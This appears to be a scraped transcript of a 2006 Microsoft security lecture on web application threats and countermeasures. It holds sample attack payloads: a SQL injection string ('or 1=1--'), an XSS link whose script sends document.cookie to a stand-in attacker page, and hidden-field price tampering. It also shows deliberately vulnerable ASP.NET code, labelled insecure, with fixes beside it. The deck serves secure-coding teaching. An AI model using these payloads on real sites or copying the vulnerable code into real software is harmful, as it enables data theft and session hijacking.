threats and threat modeling€¦ · cross-site scripting using malicious client-side script to...
Post on 01-Aug-2020
11 Views
Preview:
TRANSCRIPT
Security:Threats and Countermeasures
Stanley TanAcademic Program ManagerMicrosoft Singapore
Session Agenda
Types of threats
Threats against the application
Countermeasures against the threats
Types of Threats
Spoofed packets, etc.
Buffer overflows, illicit paths, etc.
SQL injection, XSS, input tampering, etc.
Network Host Application
Threats against
the network
Threats against the host
Threats against the application
Threats Against the Application
Threat Examples
SQL injection Including a DROP TABLE command in text typed into an input field
Cross-site scripting Using malicious client-side script to steal cookies
Hidden-field tampering
Maliciously changing the value of a hidden field
Eavesdropping Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections
Session hijacking Using a stolen session ID cookie to access someone else's session state
Identity spoofing Using a stolen forms authentication cookie to pose as another user
Information disclosure
Allowing client to see a stack trace when an unhandled exception occurs
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh10.asp?
frame=true#c10618429_004i
SQL Injection
Exploits applications that use external input in database commands
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter used to generate SQL commands
Submit input that modifies the commands
Compromise, corrupt, and destroy data
SQL Injection
How SQL Injection Works
SELECT COUNT (*) FROM UsersWHERE UserName=„Jeff‟AND Password=„imbatman‟
SELECT COUNT (*) FROM UsersWHERE UserName=„‟ or 1=1--AND Password=„‟
Model Query
Malicious Query
"or 1=1" matches every
record in the table"--" comments out the
remainder of the query
Accessing Data Securely
Use stored procedures or parameterized
commands in lieu of dynamic SQL commands
Never use sa to access Web databases
Store connection strings securely
Optionally use SSL/TLS or IPSec to secure the
connection to the database server 2,9
Apply administrative protections to SQL Server 8
i http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp
Dynamic SQL Commands
// DANGER! User input used to generate database query
string sql = String.Format ("select count (*) " +"from users where username=\'{0}\' and cast " +"(password as varbinary)=cast (\'{1}\' as " +varbinary)", username, password);
SqlCommand command = new SqlCommand (sql, connection);int count = (int) command.ExecuteScalar ();
Vulnerable to SQL injection attacks
Parameterized Commands
// BETTER: Input passed to parameterized command
SqlCommand command = new SqlCommand("select count (*) from users where " +"username=@username and cast (password as " +"varbinary)=cast (@password as varbinary)",connection);
command.Parameters.Add ("@username",SqlDbType.VarChar).Value = username;
command.Parameters.Add ("@password",SqlDbType.VarChar).Value = password;
int count = (int) command.ExecuteScalar ();
Less vulnerable to SQL injection attacks
YASID
Why you really want to secure yourself against SQL injection attacks
Cross-Site Scripting (XSS)
Exploits applications that echo raw, unfiltered input to Web pages
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter whose value is echoed to the Web page
Enter malicious script and get an unwary user to navigate to the infected page
Steal cookies, deface and disable sites
How Cross-Site Scripting Works
<a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=„ + document.cookie);</script>">…</a>
Query string contains embedded JavaScript that
redirects to attacker’s page and transmits cookies
issued by Search.aspx in a query string
URL of the site targeted by the attack
Cross-Site Scripting
Validating Input
Filter potentially injurious characters and strings
HTML-encode all input echoed to a Web page
Avoid using file names as input if possible
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh10.asp?
frame=true#c10618429_006i
Use "safe" character encodings
<globalization requestEncoding="ISO-8859-1"responseEncoding="ISO-8859-1" />
Anti-XSS Library
Download from MSDN:
http://www.microsoft.com/downloads/details.aspx?familyid=9A2B9C92-7AD9-496C-9A89-AF08DE2E5982&displaylang=en
The Anti-Cross Site Scripting Library can be used to provide comprehensive protection to Web-based applications against Cross-Site Scripting (XSS) attacks.
Input Validation
Why you shouldn’t use file names as input…
Hidden-Field Tampering
HTTP is a stateless protocol
No built-in way to persist data from one request to the next
People are stateful beings
Want data persisted between requests
Shopping carts, user preferences, etc.
Web developers sometimes use hidden fields to persist data between requests
Hidden fields are not really hidden!
How HF Tampering Works
<input type=“hidden” name="price"value="$10,000">
Page contains this…
Postback data should contain this…
price="$10,000"
Instead it contains this…
price="$1"
type="hidden" prevents the field
from being seen on the page but
not in View Source
Information Disclosure
Which is the
better error
message?
Information Disclosure
This is Insecure Code!<html>
<body><form runat="server">
<asp:TextBox ID="Input" runat="server" /><asp:Button Text="Click Me" OnClick="OnSubmit"
runat="server" /><asp:Label ID="Output" runat="server" />
</form></body>
</html>
<script language="C#" runat="server">void OnSubmit (Object sender, EventArgs e){
Output.Text = "Hello, " + Input.Text;}</script>
Why is This Code Insecure?
<html><body>
<form runat="server"><asp:TextBox ID="Input" runat="server" /><asp:Button Text="Click Me" OnClick="OnSubmit"
runat="server" /><asp:Label ID="Output" runat="server" />
</form></body>
</html>
<script language="C#" runat="server">void OnSubmit (Object sender, EventArgs e){
Output.Text = "Hello, " + Input.Text;}</script>
Input is echoed to page
without HTML encoding
Input is neither validated nor
constrained; user can type anything!
© 2006 Microsoft Corporation. All rights reserved.This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
top related